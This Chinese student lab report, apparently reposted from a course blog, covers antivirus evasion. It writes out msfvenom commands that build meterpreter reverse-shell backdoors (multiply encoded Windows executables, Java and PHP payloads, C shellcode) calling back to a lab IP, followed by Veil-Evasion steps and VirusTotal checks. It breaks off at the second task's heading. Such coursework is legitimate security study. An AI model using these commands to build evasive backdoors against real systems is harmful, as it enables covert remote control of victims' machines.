码迷,mamicode.com
首页 > 其他好文 > 详细

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

时间:2019-03-31 13:43:22      阅读:144      评论:0      收藏:0      [点我收藏+]

标签:shel   tps   sfv   端口   编码器   命令   9.png   log   ima   

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

**免杀**
- 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
- 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
- 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

实验内容

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1、使用msf编码器生成后门程序
技术图片

2、使用virus total 进行测试
技术图片

3、使用msf编码器编码15次后门程序,看看有何效果

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.142.129 LPORT=5227 -f exe > met-encoded15.exe

技术图片

4、使用msfvenom生成jar和php

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor_java.jar

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor.php

技术图片

5、使用veil-evasion进行后门生成(安装耗时太久,各种问题)安装可参照Veil-Evasion安装

  • 在``Veil-Evasion文件夹下输入命令./Veil-Evasion.py``` 启动
    技术图片

  • 使用命令:use 然后 7 设置IP和端口
    技术图片

  • 使用generate 生成后门
    技术图片

  • 使用virus total 进行测试
    技术图片

6、利用shellcode编程

  • 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.129 LPORT=5227 -f c
    技术图片

任务二:Linux平台交叉编译Windows应用

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

标签:shel   tps   sfv   端口   编码器   命令   9.png   log   ima   

原文地址:https://www.cnblogs.com/zhuyue-study/p/10630782.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!